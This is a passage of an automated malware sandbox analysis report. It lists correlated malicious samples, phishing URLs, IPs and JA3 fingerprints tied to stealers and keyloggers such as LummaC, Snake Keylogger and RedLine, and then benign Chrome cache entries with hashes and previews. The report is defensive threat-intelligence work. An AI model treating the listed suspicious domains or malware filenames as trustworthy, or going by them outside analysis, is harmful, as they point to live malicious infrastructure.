                                                                                                                                                                                                                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/?setln=pl
                                                                                                                                                                                                                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                      http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • telegram.dog/
                                                                                                                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                      • t.me/cinoshibot

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      t.meExternal2.4.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      Superority.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      ResPencil.5.6.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      ALfzrNn09x.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      EasyWay.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      EasyWay.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      Aura.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      SecuriteInfo.com.Trojan.PWS.Lumma.1819.11767.23234.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      plus.l.google.comhttps://rightful-faithful-kettledrum.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.238
                                                                                                                                                                                                                      https://excitedgleamingrefrigerate.com/vk5vsp1ayymkey=5e919c21ede3f1e9ee4f39f38bb2bdebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.206.46
                                                                                                                                                                                                                      Online Notification.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 142.250.185.174
                                                                                                                                                                                                                      https://2ly.link/25AOkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.142
                                                                                                                                                                                                                      http://www.google.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.142
                                                                                                                                                                                                                      Solicitud de cotizacion de productos RFQ9505247.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.212.142
                                                                                                                                                                                                                      f1215469392.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.142
                                                                                                                                                                                                                      ReK7Ewx.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.174
                                                                                                                                                                                                                      413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 142.250.185.206
                                                                                                                                                                                                                      Magic_V_pro_setup_stable_latest_release_version_9_709.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 142.250.181.238
                                                                                                                                                                                                                      play.google.comhttps://rightful-faithful-kettledrum.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.206.78
                                                                                                                                                                                                                      https://excitedgleamingrefrigerate.com/vk5vsp1ayymkey=5e919c21ede3f1e9ee4f39f38bb2bdebGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.206
                                                                                                                                                                                                                      https://docs.google.com/forms/d/e/1FAIpQLSerD3TiLe71wYLfxltb7xs0UPwZ1bDohJF0kC_aBDKnCQeN0A/viewform?usp=send_formGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.181.238
                                                                                                                                                                                                                      https://www.youtube.com/channel/UCzwxIBbA4-VpGrl_cZagU9QGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.46
                                                                                                                                                                                                                      https://2ly.link/25AOkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.217.18.14
                                                                                                                                                                                                                      http://www.google.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.181.238
                                                                                                                                                                                                                      Solicitud de cotizacion de productos RFQ9505247.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 172.217.16.206
                                                                                                                                                                                                                      https://sites.google.com/view/mdooee/accueil?authuser=2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 216.58.206.46
                                                                                                                                                                                                                      https://cdn-facxxx.b-cdn.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.186.78
                                                                                                                                                                                                                      https://youtu.be/lqfR3CHGCNQ?si=o9SA3JjXZZDT0hewGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 142.250.185.174

                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      TELEGRAMRUmXjBoW24W3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      TgmlmFK3Ol.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      niceworkingskilldevelopedwithgreatnews.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      ap3rCD0rxv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      6bHVQxQ4Wu.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      z2TIhJXb0s.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      XFCaCR5AKj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      NXQOX3keIQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      ap3rCD0rxv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      z2TIhJXb0s.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                      CLOUDFLARENETUSVYxKYUIYs4.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                      mXjBoW24W3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                      path.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 162.159.136.232
                                                                                                                                                                                                                      jklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 1.12.16.69
                                                                                                                                                                                                                      TgmlmFK3Ol.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                      xmGCsTzlDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                      https://rightful-faithful-kettledrum.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.18.31.78
                                                                                                                                                                                                                      http://video.sibnet.ruGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                      • 1.1.1.1
                                                                                                                                                                                                                      GTA_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.18.11.89
                                                                                                                                                                                                                      zkwindow.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                      • 188.114.97.3

                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      CryptocommSetup.msiGet hashmaliciousBumbleBeeBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      COTA#U00c7#U00c3O.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      Order_Mar25.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      POETDB24-2577.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 104.21.11.150
                                                                                                                                                                                                                      • 149.154.167.99

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                      Chrome Cache Entry: 66

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                      Chrome Cache Entry: 67

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1437)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):117390
                                                                                                                                                                                                                      Entropy (8bit):5.490758436358278
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:jMyvhJyj1UjPEWKcxUww3wM0W/N79419n5QJEx:jMyfyj1cPPC70W/Na5QJEx
                                                                                                                                                                                                                      MD5:B52266FAD5115039E3806FF8DCD71F86
                                                                                                                                                                                                                      SHA1:8007278E322C8EA9F3CB5B62008E3E3599E9F659
                                                                                                                                                                                                                      SHA-256:E390D05D78F6E51B03F7C3D1D0C3B7C3E79B3D53C4F83685CFAD83D2E863456E
                                                                                                                                                                                                                      SHA-512:58293A89F48926A7059F6C91AA79EBD941072D3BC31AA571342ABA76F007981750620F960CCB59E9E3C828FC8E1748B500E3138381D82EF8A171AD7C60F5C5FC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0"
                                                                                                                                                                                                                      Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var aa,ea,la,oa,ya,Ba,Ca;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.la=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.na=la(this);oa=function(a,b){if(b)a:{var c=_.na;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.oa("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                      Chrome Cache Entry: 68

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):132154
                                                                                                                                                                                                                      Entropy (8bit):5.436662961080419
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:M+GkpdApMNrBdM1rG5wFazHWDEvhW/6z6x0zW:j3dAcddM1rG5wFazHkEvhu46AW
                                                                                                                                                                                                                      MD5:362867BC7334A5F7DC32D7464490424B
                                                                                                                                                                                                                      SHA1:E9579A9E939A7A8AAC8EAD68BB2DD15E8ED542AC
                                                                                                                                                                                                                      SHA-256:36FB7441F6C694C6F6A19239C594877C1DF603ECE3E065C0C03B10974CE4408D
                                                                                                                                                                                                                      SHA-512:B44123D482F4789CED37F257FE24FCDB409658863BA5A9AA666694BF06FBBC53D62347CDE5BDE625724F2B831EFA2B963B6308E64AED386AF37AAB0E92BA3466
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                      Chrome Cache Entry: 69

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2412)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):172367
                                                                                                                                                                                                                      Entropy (8bit):5.555151369878942
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:VYTnZPpkkAVa5OwOYCNwWYMJ20IovCVcXBK28hhqfFQP+n/fmgxZJcQ4zX+te2Wd:VYTnZukAVa5OwOYCNwW3J20IovucXBKJ
                                                                                                                                                                                                                      MD5:F127A30F593CB96090AF164F4DD04E94
                                                                                                                                                                                                                      SHA1:8E45FAD5740967D50101E413F98F646D424E9385
                                                                                                                                                                                                                      SHA-256:6BE436287AF7A70143564DB4F2FFDCE5DED1241FFE85BF210E4495F873C63A33
                                                                                                                                                                                                                      SHA-512:D1A5DD175ABE8C4C7EC5C9E534E5C4B30A6F954F290ED05001FDDE5A6A92CF398604180BD1CCFB856A7C81B08C19F841624E4AECA7AB135B0C404C03E84989FC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTt0d-Ss5kisT1M_8rsOzCdvCZrVWg"
                                                                                                                                                                                                                      Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Qi=function(a){if(4&a)return 2048&a?2048:4096&a?4096:0};_.Ri=class extends _.P{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Si,Vi,Wi,Yi,Zi,bj;Si=function(){return typeof BigInt==="function"};Vi=function(a){const b=a>>>0;_.Ti=b;_.Ui=(a-b)/4294967296>>>0};Wi=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Xi=function(a){if(a<0){Vi(-a);const [b,c]=Wi(_.Ti,_.Ui);_.Ti=b>>>0;_.Ui=c>>>0}else Vi(a)};Yi=function(a){a=String(a);return"0000000".slice(a.length)+a};.Zi=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else Si()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c*6777216+b*6710656,c+=b*8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+Yi(c)+Yi(a));return c};_.$i=function(a,b){if(b&2147483648)if(Si())a=""+(BigInt(b|0)<<BigInt(32)|BigInt(a>>>0));else{const [c,d]=Wi(a,b);a="-"+Zi(c,d)}else a=Zi(a,b);return a};._.aj

                                                                                                                                                                                                                      Chrome Cache Entry: 70

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                                                                      Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                      MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                      SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                      SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                      SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                      Chrome Cache Entry: 71

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2970)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):2975
                                                                                                                                                                                                                      Entropy (8bit):5.8723599307903855
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:ULkzKlgJXwRDaa74aa9ld66666e0CrEIaZhvv59LHJY+JU3kzZLvx47OSyFw2ACm:UNl4Fd66666rCrEXk+JU3kz5547OtIgM
                                                                                                                                                                                                                      MD5:42BE0FBDF66ECA374708F437157A6965
                                                                                                                                                                                                                      SHA1:375545D1028616DE998122D24D25A9982F1D1A54
                                                                                                                                                                                                                      SHA-256:9D201A1332012B88E4BA61549EFD183ECAF32A41F78FDA64D18CFCB4D993A24D
                                                                                                                                                                                                                      SHA-512:0EE06CC90AD5B5BA0FF3A825B5BAC6257C210F053B6C76CE5D79E71C6E8AF73F8FB7BC3CFFF07D51211E1B8CB84295E97ADC8AD13F8345DA310548C288D39A5F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                                                                                                                                                                      Preview:)]}'.["",["the bachelor tonight","correctional officers strike","mega millions jackpot lottery","apple iphone 17 pro max","spacex falcon 9 rocket launch","watch unwanted true mate","oil tanker cargo ship collision","boston bruins brad marchand"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"google:entityinfo":"CgkvbS8wMTdtdGISK1RoZSBCYWNoZWxvciDigJQgQW1lcmljYW4gdGVsZXZpc2lvbiBzZXJpZXMy6wpkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0FnTUJBQUFBQUFBQUFBQUFBQUFEQkFJR0FBRUZCLy9FQUN3UUFBSUJBd01DQlFNRkFRQUFBQUFBQUFFQ0F3QUVFUVVTSVRGQklqSlJZWEVHZ2FFVEZHS1J3VkwveEFBYUF

                                                                                                                                                                                                                      Chrome Cache Entry: 72

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):5162
                                                                                                                                                                                                                      Entropy (8bit):5.349865760247148
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:mtOTUb1db1ClNY5co7shdiUYVqig7O7aZCUgpgXEt94k+g8IHh8u928DoCLQ:mtOT8TfL1Vqig7mIg8IB8u88DA
                                                                                                                                                                                                                      MD5:70A8F21806E7F1B739937970EBE49A0C
                                                                                                                                                                                                                      SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                                                                                                                                                                                                      SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                                                                                                                                                                                                      SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuS2lB4IRlJuMaoM0QgSoTOihj9Bg"
                                                                                                                                                                                                                      Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                      Entropy (8bit):7.997627482833052
